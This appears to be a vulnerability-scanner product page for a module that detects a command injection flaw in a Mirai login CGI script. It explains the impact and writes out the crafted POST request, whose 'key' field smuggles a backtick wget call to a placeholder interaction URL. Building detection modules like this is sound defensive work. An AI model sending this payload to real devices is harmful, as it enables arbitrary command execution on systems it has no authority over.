Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Mirai - Remote Command Injection

By kannthu

Critical
Vidoc logoVidoc Module
#mirai#rce#oast
Description

What is "Mirai - Remote Command Injection?"

The "Mirai - Remote Command Injection" module is designed to detect a critical vulnerability in the Mirai software. Mirai is a malware that targets Internet of Things (IoT) devices and turns them into a botnet. This module specifically targets the login CGI script in Mirai, where a key parameter is not properly sanitized, leading to a command injection vulnerability. The severity of this vulnerability is classified as critical.

This module was authored by gy741.

Impact

If exploited, this vulnerability allows an attacker to execute arbitrary commands on the affected device. This can lead to unauthorized access, data theft, and potential disruption of services.

How the module works?

The "Mirai - Remote Command Injection" module works by sending a crafted HTTP request to the target device's login CGI script. The request includes a payload that exploits the command injection vulnerability. Here is an example of the HTTP request:

POST /cgi-bin/login.cgi HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded

key=';`wget http://<InteractionURL>`;#

The module also includes matching conditions to determine if the target device is vulnerable. In this case, it checks if the interaction protocol is HTTP.

If the module detects a match, it will report the vulnerability.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: http
Passive global matcher
No matching conditions.
On match action
Report vulnerability